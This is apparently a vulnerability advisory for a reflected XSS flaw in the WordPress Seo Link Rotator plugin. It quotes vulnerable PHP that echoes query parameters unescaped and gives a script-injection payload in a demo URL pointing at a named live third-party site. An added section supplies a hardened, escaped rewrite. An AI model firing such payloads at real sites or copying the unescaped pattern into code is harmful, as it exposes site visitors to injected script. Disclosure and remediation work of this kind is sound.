WordPress Seo Link Rotator Cross Site Scripting

2014.01.28
Credit: ACC3SS
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######################
# Exploit Title : Wordpress Seo Link Rotator Plugin Cross Site Scripting
# Exploit Author : ACC3SS
# Vendor Homepage : http://www.seolinkrotator.com
# Software Link : http://www.seolinkrotator.com/download/files/seolinkrotator.zip
# Date : 2014-01-19
# Tested on : Windows 7 / Mozilla Firefox Web Browser
# Discovered by : ACC3SS
######################
# Vulnerability code :

<?php
$action = $_GET['action'];
switch($action){
    case "buildLink":
        $linkURL = $_GET['URL'];
        $linkTitle = urldecode($_GET['title']);
        $type = $_GET['type'];
?>
<div class="seoLinkRotatorInfo">
    <h2>Link To This <?=ucwords($type)?></h2>
    <p>If you would like to share this <?=$type?> with someone else just copy and paste the HTML into one of your pages:</p>
    <div class="seoLinkHTMLBox">
        <?php echo '&lt;a href="' . $linkURL . '"&gt;' . $linkTitle . '&lt;a&gt;'; ?>
    </div>
</div>
<?php
        break;
    default:
        echo 'Unkown action';
        break;
}
?>

######################
# Location : localhost/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title=[Xss]
######################
# Demo :
# http://www.porterpr.com/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title= "/><script>alert(1);</script>
######################
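Added example (not the vendor's code and not part of the original advisory): a hardened rewrite of the buildLink branch of pusher.php. The quoted code reflects three query parameters unescaped, not only title: URL is concatenated straight into the echoed string, and type is printed twice via <?=$type?> and ucwords($type). The version below keeps the same parameters and output structure but HTML-escapes every reflected value, restricts URL to absolute http(s) links, and rejects array-valued parameters. The helper names (seolr_esc, seolr_clean_url, seolr_param) are assumptions chosen for this example.

```php
<?php
// Added example: hardened buildLink branch for pusher.php. Not the vendor's
// code. Helper names are assumptions chosen for this illustration.

// Escape a string for use as HTML text or as a double-quoted attribute value.
function seolr_esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Accept only absolute http(s) URLs. javascript:, data:, relative paths and
// garbage are rejected so they are never reflected at all.
function seolr_clean_url(string $url): ?string {
    $url = trim($url);
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $url : null;
}

// $_GET values may be arrays (?title[]=x), which would make the string
// functions emit warnings or the literal word "Array"; coerce to string.
function seolr_param(string $name): string {
    return (isset($_GET[$name]) && is_string($_GET[$name])) ? $_GET[$name] : '';
}

header('Content-Type: text/html; charset=UTF-8');
header('X-Content-Type-Options: nosniff');

$action = seolr_param('action');

switch ($action) {
    case 'buildLink':
        // PHP already URL-decodes the query string, so the original's extra
        // urldecode() on title is dropped rather than decoding twice.
        $linkURL   = seolr_clean_url(seolr_param('URL'));
        $linkTitle = seolr_param('title');
        $type      = seolr_param('type');

        if ($linkURL === null || $linkTitle === '') {
            http_response_code(400);
            echo 'Invalid link parameters';
            break;
        }

        // Build the HTML the visitor is meant to copy, with the attribute and
        // text escaped once. It is then escaped a second time when printed,
        // so the browser displays the markup as text instead of executing it.
        $snippet = '<a href="' . seolr_esc($linkURL) . '">' . seolr_esc($linkTitle) . '</a>';
?>
<div class="seoLinkRotatorInfo">
    <h2>Link To This <?= seolr_esc(ucwords($type)) ?></h2>
    <p>If you would like to share this <?= seolr_esc($type) ?> with someone else just copy and paste the HTML into one of your pages:</p>
    <div class="seoLinkHTMLBox">
        <?= seolr_esc($snippet) ?>
    </div>
</div>
<?php
        break;
    default:
        http_response_code(400);
        echo 'Unknown action';
        break;
}
```

With this in place the demo request (title="/><script>alert(1);</script>) renders as the literal text &lt;a href=&quot;...&quot;&gt;&quot;/&amp;gt;&amp;lt;script&amp;gt;... inside the box, and a request with URL=javascript:alert(1) gets a 400 instead of a reflected link.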

References:

http://www.seolinkrotator.com/download/files/seolinkrotator.zip

